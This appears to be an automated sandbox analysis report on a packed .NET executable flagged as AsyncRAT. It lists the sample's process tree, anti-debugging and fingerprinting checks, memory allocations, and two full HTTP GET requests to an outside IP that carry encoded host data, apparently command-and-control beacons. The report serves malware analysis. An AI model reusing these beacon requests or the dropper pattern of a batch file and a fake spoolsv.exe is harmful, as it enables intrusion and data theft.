Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 31, 2021, 1:26 p.m.	July 31, 2021, 1:50 p.m.

Size	1.2MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`529156ed28b10d5152cbbdb85db59355`
SHA256	`d6f77ffe0af94a159322e345040797c44aba43f2188c82a341dc8efc3fa216fd`
CRC32	`3753DBDC`
ssdeep	`24576:Ar7e3ua9PUH7gSvs1wdBe9+4hzrJrchbcFFm8bk+4:A0GH7O1wdA93chyf`
Yara	Malicious_Packer_Zero - Malicious Packer OS_Processor_Check_Zero - OS Processor Check Generic_Malware_Zero - Generic Malware Is_DotNET_EXE - (no description) UPX_Zero - UPX packed file IsPE32 - (no description) PE_Header_Zero - PE File Signature Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

intonetrefruntimedhcp.exe "C:\Users\test22\AppData\Local\Temp\intonetrefruntimedhcp.exe"
660
- cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\test22\AppData\Local\Temp\5xoFIf0Dgq.bat"
  2620
  - chcp.com chcp 65001
    2688
  - w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    2732
  - spoolsv.exe "C:\Windows\System32\dinotify\spoolsv.exe"
    2948

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
94.103.80.73	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (25 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:26 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 31, 2021, 1:27 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2021, 1:26 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:26 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: The batch file cannot be found. console_handle: 0x000000000000000b	1	1	0
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: Active code page: 65001 console_handle: 0x0000000000000013	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2021, 1:26 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.sdata

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 31, 2021, 1:27 p.m.	stacktrace: 0x7fe932107ba 0x7fe9321059b 0x7fe932104d1 0x7fe931723c4 mscorlib+0x4ef8a5 @ 0x7fef161f8a5 mscorlib+0x4ef609 @ 0x7fef161f609 mscorlib+0x4ef5c7 @ 0x7fef161f5c7 mscorlib+0x502d21 @ 0x7fef1632d21 CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef27df713 CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef27df242 CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef27df30b NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef29a6291 DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2886d80 DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2886d0e DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2886c85 DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2886dbb NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef29a6175 StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef29166ae BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521 exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 f4 63 exception.instruction: cmp byte ptr [rax], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7fe932107ba registers.r14: 0 registers.r15: 0 registers.rcx: 0 registers.rsi: 0 registers.r10: 8789971366888 registers.rbx: 0 registers.rsp: 484113920 registers.r11: 484108496 registers.r8: 42507820 registers.r9: 42507804 registers.rdx: 42507792 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

July 31, 2021, 1:27 p.m.

stacktrace:

0x7fe932107ba
0x7fe9321059b
0x7fe932104d1
0x7fe931723c4
mscorlib+0x4ef8a5 @ 0x7fef161f8a5
mscorlib+0x4ef609 @ 0x7fef161f609
mscorlib+0x4ef5c7 @ 0x7fef161f5c7
mscorlib+0x502d21 @ 0x7fef1632d21
CoUninitializeEE+0x4c56f GetMetaDataInternalInterface-0x2b1ad clr+0x4f713 @ 0x7fef27df713
CoUninitializeEE+0x4c09e GetMetaDataInternalInterface-0x2b67e clr+0x4f242 @ 0x7fef27df242
CoUninitializeEE+0x4c167 GetMetaDataInternalInterface-0x2b5b5 clr+0x4f30b @ 0x7fef27df30b
NGenCreateNGenWorker+0x682d _AxlPublicKeyBlobToPublicKeyToken-0x409df clr+0x216291 @ 0x7fef29a6291
DestroyAssemblyConfigCookie+0x157fc PreBindAssembly-0xc054 clr+0xf6d80 @ 0x7fef2886d80
DestroyAssemblyConfigCookie+0x1578a PreBindAssembly-0xc0c6 clr+0xf6d0e @ 0x7fef2886d0e
DestroyAssemblyConfigCookie+0x15701 PreBindAssembly-0xc14f clr+0xf6c85 @ 0x7fef2886c85
DestroyAssemblyConfigCookie+0x15837 PreBindAssembly-0xc019 clr+0xf6dbb @ 0x7fef2886dbb
NGenCreateNGenWorker+0x6711 _AxlPublicKeyBlobToPublicKeyToken-0x40afb clr+0x216175 @ 0x7fef29a6175
StrongNameSignatureVerification+0x5a22 GetCLRFunction-0x7712 clr+0x1866ae @ 0x7fef29166ae
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7689652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76fac521

exception.instruction_r: 80 38 00 48 8b 4c 24 40 48 8b 54 24 48 e8 f4 63
exception.instruction: cmp byte ptr [rax], 0
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x7fe932107ba
registers.r14: 0
registers.r15: 0
registers.rcx: 0
registers.rsi: 0
registers.r10: 8789971366888
registers.rbx: 0
registers.rsp: 484113920
registers.r11: 484108496
registers.r8: 42507820
registers.r9: 42507804
registers.rdx: 42507792
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 0
registers.r13: 0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	Connection to IP address				suspicious_request	GET http://94.103.80.73/Packetbasetraffic.php?mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM&cd9d37af20d201d2163f19403bbb9dd8=91ec0d6fa24ef6431113d7d323a081da&0a843b55ae7380be744bbf239c8d0d28=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM
suspicious_features	Connection to IP address				suspicious_request	GET http://94.103.80.73/Packetbasetraffic.php?mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM&7d323b4a145837be4f4782fd94aa04b9=wY1YmNwUWYkZmZzEWZlZTOldjN3AjMhljM0YzMlJ2Y2Q2NlFTZiVmMzADMxUTMxITOzITO0MTM&0a843b55ae7380be744bbf239c8d0d28=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&ad26823b07b8cbcd7ff745afd1954775=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiQWZ3IzMxgDM4IWN0UTMhVWO5EjNkNzMidDM1YGNiZ2YiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiQWOmZTNjNWO1YGNyU2N2AjZwATO1YmM1ATZwQmYygDOis3W&a3729499a3865912c422a5dac7bbf881=d1nIiojIzQjM1IDO5ATYzgjYlZTOzITO1ATOjVjZhRGMxITY3kjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIkV2NyMTM4ADOiVDN1ETYllTOxYDZzMjY3ATNmRjYmNmIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIkljZ2UzYjlTNmRjMldjNwYGMwkTNmJTNwUGMkJmM4gjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJlXT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMDNyUjM4kDMhNDOiVmN5MjM5UDM5MWNmFGZwEjMhdTOiwiI2kTMlRzY1ITZygjM0YjY2ETZiFjMzUDOjNmYxETNjlDMlRTM1ITYzIiOiQWZ3IzMxgDM4IWN0UTMhVWO5EjNkNzMidDM1YGNiZ2YiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiQWOmZTNjNWO1YGNyU2N2AjZwATO1YmM1ATZwQmYygDOis3W

Performs some HTTP requests (2 events)

request

GET http://94.103.80.73/Packetbasetraffic.php?mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM&cd9d37af20d201d2163f19403bbb9dd8=91ec0d6fa24ef6431113d7d323a081da&0a843b55ae7380be744bbf239c8d0d28=QNjhTO4Q2NiJWMjRWO1IjYwIjM5ADNzQWMiVWNxUjNxIzMmJmY3QGO&mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM

request

GET http://94.103.80.73/Packetbasetraffic.php?mE26Fltvqxdt=Wj88rUM3ADF3YncQLJ4q7S46Fv0e5&MAP4J6Z2Hs=bmBwDr7QefnjC6DoB35&s8t0Enddf1SBLHgp=JBE3NavibN8GSX9MP0d3KsaNdunM&7d323b4a145837be4f4782fd94aa04b9=wY1YmNwUWYkZmZzEWZlZTOldjN3AjMhljM0YzMlJ2Y2Q2NlFTZiVmMzADMxUTMxITOzITO0MTM&0a843b55ae7380be744bbf239c8d0d28=gZlVmYmFTOxU2N5EmMhZTZ0IDOihjY1ITY3gTO2ATOhRGOjNzY1UWN&ad26823b07b8cbcd7ff745afd1954775=d1nIwQTZ0YTO1EGZjZTY2QWO0YDZzMmZ2MjYjlTYzI2NhZzNldDO1IWYlJiOiQWZ3IzMxgDM4IWN0UTMhVWO5EjNkNzMidDM1YGNiZ2YiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiQWOmZTNjNWO1YGNyU2N2AjZwATO1YmM1ATZwQmYygDOis3W&a3729499a3865912c422a5dac7bbf881=d1nIiojIzQjM1IDO5ATYzgjYlZTOzITO1ATOjVjZhRGMxITY3kjIsICM0UGN2kTNhR2Y2EmNklDN2Q2MjZmNzI2Y5E2MidTY2cTZ3gTNiFWZiojIkV2NyMTM4ADOiVDN1ETYllTOxYDZzMjY3ATNmRjYmNmIsISNwYWNycDN1AzNlVWN4MGNyMGNlBzNyYGM2MjZ1Y2Y0YmMhdDZ4IzNiojIkljZ2UzYjlTNmRjMldjNwYGMwkTNmJTNwUGMkJmM4gjI7xSfikjSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJN1Vp9maJVHbXJ2aGBzYwp0QMlGNrlkNJNlYo5UbZxGZxMGcKNETptGbJZTSTpVd5cUY3lTbjpGbXRles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlEMZRUSPRXRJNnRtJmdsJzY6ZVbaZnSIV1ZjRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5o0UZxmSzIGTCNUYwY1MiRlQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzl0UPRTRU1UdjpWT4dXaNhXQU5UdjpXTp9maJpWOHJWa3lWSTR3aJZTSTVWeS5mYxkjMZl2dpl0cWNjYs5EbJZTSpJmdsJjWspkbJNXSTRmbxMVW3RWbiZnTslkNJNVZwwmMZl2dpl0dVRVT1FleNhHND90dJpGTxMGVNl2bql0ds1WS3AnaJZnWtJmSCh1UpdXaJlXSERmeWdEZp9maJxWMXl1TKhlW6ZFbJNXS5FVUxkWT5FVMVZkUslkNJNlW0ZUbURkQsl0cJlXT4RTeNVXUqlkNJl2YspFbjxmWuNGbOxWSzlUallEZF1EN0kWTnFURJZlQxE1ZBRUTwcGVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSDJ0QNdGMDl0dTl1NSlHN2ATYKdzZwwEb0pGcuJna3QXcENVUIplRJF0ULdzYHp1Np9maJxWMXl1TWZUVIp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiMDNyUjM4kDMhNDOiVmN5MjM5UDM5MWNmFGZwEjMhdTOiwiI2kTMlRzY1ITZygjM0YjY2ETZiFjMzUDOjNmYxETNjlDMlRTM1ITYzIiOiQWZ3IzMxgDM4IWN0UTMhVWO5EjNkNzMidDM1YGNiZ2YiwiI1AjZ1IzN0UDM3UWZ1gzY0IzY0UGM3IjZwYzMmVjZjRjZyE2NkhjM3IiOiQWOmZTNjNWO1YGNyU2N2AjZwATO1YmM1ATZwQmYygDOis3W

Allocates read-write-execute memory (usually to unpack itself) (50 out of 202 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 2490368 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000600000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000007e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f1000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2f8b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001fd0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000020a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f2000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef28f4000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9315c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93280000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe931fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93226000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93200000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9314b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9316b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:26 p.m.	process_identifier: 660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9319c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
